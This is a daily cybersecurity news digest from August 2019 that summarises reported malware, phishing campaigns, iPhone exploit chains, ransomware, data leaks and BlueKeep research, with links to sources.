Threat Reports

Silobreaker Daily Cyber Digest – 30 August 2019

 

Malware

New Android RAT used to spy on targets in Brazil

  • Researchers at Kaspersky identified a new android remote access tool (RAT), dubbed BRATA malware, exclusively targeting users in Brazil. To run correctly, the virus requires users to have Android Lollipop 5.0 or later.
  • The malware has been widespread since January 2019 and over 20 variants have appeared on the Google Play Store. The majority of these variants purport to be security updates from WhatsApp. Infection vectors included push notifications on compromised websites, SMS or WhatsApp messages, and sponsored links in Google searches.
  • When BRATA is installed on a victim’s device it can run keylogging functions which are enhanced with real-streaming functionality. The malware can also be used to interact with apps on the user’s device by using Android’s Accessibility Service feature.

Source (Includes IOCs)

 

Ongoing Campaigns

New multistage phishing campaign discovered stealing PayPal credentials

  • Trend Micro researchers discovered a new phishing campaign, dubbed Heatstroke, that uses multiple stages to steal PayPal credentials. These include the phishing email being sent from a legitimate domain to avoid being blocked by spam filters and appear more legitimate, a first-stage website that avoids content filters, the phishing kit website that checks the victim’s IP address against a range of blocked addresses, and the actual phishing site that is localized to match the victim’s IP address.
  • Once a victim enters their credentials, they are sent to the attacker via regular email and in some cases using steganography. The researchers found the complete code for steganography to be missing, suggesting that this function is still in development.
  • A phishing kit with similar tactics and techniques was also found to be targeting Amazon users, suggesting they have the same origin. The attackers also appear to have adopted a phishing-as-a-service business model and code in the kit suggests the attackers plan on running similar kits for eBay, Google, Apple, Firefox, and more.

Source (Includes IOCs)

 

Researcher publishes analysis of watering hole attack abusing iPhone zero-day

  • Google’s Project Zero researcher Ian Beer published his analysis of a watering hole attack discovered by Google’s Threat Analysis Group in February 2019. The attack involved multiple hacked websites, targeting iPhone users running iOS 10 through to iOS 12 with five separate iPhone exploit chains.
  • The exploits were for fourteen vulnerabilities, seven of which were found in Safari, five in the kernel and two separate sandbox escapes. One of the exploitation chains was a zero-day, abusing CVE-2019-7287 and CVE-2019-7286, which was fixed by Apple shortly after discovery.
  • The attack was said to be indiscriminate, with anyone visiting the hacked websites being attacked by the exploit server, which then installed a monitoring implant. The implant focused on stealing files and uploading live location data and had access to database files used by end-to-end encryption apps such as WhatsApp, Telegram and iMessage.
  • A full technical analysis of each exploit chain and the implant is available on Project Zero’s blog.

Source

 

New campaign embeds Trickbot in Google Docs link to bypass Proofpoint’s gateway

  • Researchers at Cofense discovered a new phishing campaign that managed to bypass Proofpoint’s gateway by embedding Trickbot in a Google Docs link.
  • The attackers send emails pretending to be a legitimate message from Google Docs that is usually sent when a file has been shared. However, the victim is instead redirected to a fake 404 site containing another embedded link, where they are asked to manually download the file via the link. Once clicked, it downloads the malicious payload that is disguised as a PDF.

Source (Includes IOCs)

 

Ad clicker apps downloaded over 1.5 million times by Google Play users

  • Researchers at Symantec identified two apps on the Google Play Store that contain a stealthy ad-clicking function. Published by Idea Master, the notepad and fitness app, had been collectively downloaded approximately 1.5 million times. The apps were present on the Google Play Store for nearly a year, remaining undetected as they used a legitimate Android Packer. 
  • The attack begins with a notification in the user’s notification drawer. When the notification is clicked on, Toast displays a hidden view containing advertisements. The attackers also draw adverts on a Canvas outside the device’s viewable display. Users are unable to see the adverts and malicious content running on their device.
  • Devices that are infected will quickly become low on battery, run with degraded performance, and use mobile data.

Source (Includes IOCs)

 

Fake Smart Game Booster site contains Baldr infostealer trojan

  • Researchers at Malware Hunter Team discovered a malicious site that appears identical to the Smart Game Booster site. The malicious site purports to provide performance enhancing software for gaming. Users who download software from the fake site will infect their devices with a variant of Baldr Infostealer.
  • The malware can exfiltrate saved login credentials, browser profiles, cryptocurrency wallets, text documents, FTP programs, and more. The trojan does not feature persistence capabilities and runs only once on the target device before removing itself.

Source (Includes IOCs)

 

Hacker Groups

FIN6 threat group attacks multinational organizations for financial gain

  • Researchers at IBM X-Force identified attacks directed against multinational organizations by the financially motivated threat actor FIN6. The group, which have been operational since 2015, have previously targeted POS machines, e-commerce checkout pages, and the hospitality sector in the US and Europe.
  • The researchers stated that this recent campaign employs spear phishing emails to initiate an infection process which results in the delivery of More_eggs malware. The JavaScript backdoor malware is sold on the dark web and is used to create and achieve persistence in a compromised network. The attackers also use PowerShell commands with base64 encoding, Comodo code signing certificates, and more.

Source (Includes IOCs)

 

Members of cybercrime group TipTop arrested

  • Russian authorities, in coordination with Group-IB, tracked down and arrested members of the TipTop Group. The group has been active since 2015 and is believed to have infected over 800,000 Android smartphones.  
  • The group rented Android banking trojans which they distributed through third-party app stores and search engine adverts. TipTop primarily employed Hqwar malware which can read SMS messages, record calls and display fake login screens on top of legitimate banking apps.
  • The criminals primarily targeted the customers of Russian banks. Group-IB researchers estimated that the operators were earning between $1,500 and $10,500 daily. 

Source

 

Leaks and Breaches

Russian surveillance devices found to be leaking data

  • Security researcher Leonid Evdokimov discovered 30 SORM devices running on unsecured FTP servers, exposing traffic logs from past law enforcement surveillance operations. SORM is hardware equipment used by Russian authorities enabling them to connect to devices, set up filtering and logging rules, and retrieve logged data.
  • Exposed data included GPS coordinates for residents of Sarov, ICQ instant messenger usernames, IMEI numbers, telephone numbers, router MAC addresses and GPS coordinates from individuals in Novosilske, and GPS coordinates from smartphones with outdated firmware.
  • The leak was first discovered in April 2018 and all devices were secured by August 26th, 2019. It remains unclear what caused the leak.

Source

 

PerCSoft dental record storage and backup provider infected with ransomware

  • Digital Dental Record’s cloud management provider PerCSoft was hit with a ransomware attack on August 26th, 2019. The company operates an online data backup service, DDS Safe, that is used by dental practices to archive medical records, insurance documents, charts, and more. The attack encrypted DDS Safe, impacting files of approximately 400 dental practices.
  • Several sources are reporting that the ransomware is a recent and advanced variant of Sodinokibi malware. Purported screenshots of conversations between an affected dental office and PerCSoft also appear to show that PerCSoft or their insurer has paid the ransom.
  • Affected dental offices have been provided with a decryptor and 80 to 100 clients have restored their files. However, some practices are reporting that the key is not working.

Source

 

Starbucks expose subdomain through abandoned Azure site

  • On August 1st, 2019, security researcher Parzel discovered a Starbucks subdomain containing a DNS pointer to an abandoned Azure cloud host. By claiming the Azure resource name, an attacker could use the Starbucks subdomain to perform cross-site scripting and session hijacking attacks. Parzel disclosed the vulnerability to Starbucks who resolved the issue.

Source

 

TGI Fridays Australia expose data of loyalty program customers

  • On August 29th, 2019, TGI Fridays Australia confirmed that a publicly exposed database contained data relating to the MyFridays membership reward program. The company declined to comment on the nature of the data or how long it was exposed for. An email was sent to customers, ‘strongly recommending’ that they change their membership reward program password.

Source

 

Vulnerabilities

Researchers publish analysis of BlueKeep exploitation

  • Researchers at Palo Alto Networks Unit 42 analysed the remote code execution vulnerability CVE-2019-0708, commonly known as BlueKeep, to understand how Remote Desktop Services (RDS) in Windows could be exploited. The wormable flaw was patched in May 2019 and users are encouraged to patch their systems.
  • The research focuses on three ways of writing data into the kernel with RDP PDU, namely Bitmap cache PDU, Refresh Rect PDU and RDPDR Client Name Request PDU. The researchers believe other ways of facilitating the exploitation exist, but have not been documented yet.

Source

 

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

More News

  • Silobreaker Daily Cyber Digest – 20 September 2019

      Malware Agent Tesla leveraged in email campaign Discovered by Xavier Mertens, the email campaign attempts to deliver an ACE archive labelled ‘Parcel Frieght...
  • Silobreaker Daily Cyber Digest – 19 September 2019

      Malware Ramnit returns with new capabilities Researchers at RSA Security observed several changes in the functionality, targets and methods of distribution of Ramnit....
  • Silobreaker Daily Cyber Digest – 18 September 2019

        Malware New TSCookie variant uses new configuration and communication protocols Researchers at Japan’s Computer Emergency Response Team Coordination Center observed a new...
View all News

Request a demo

Get in touch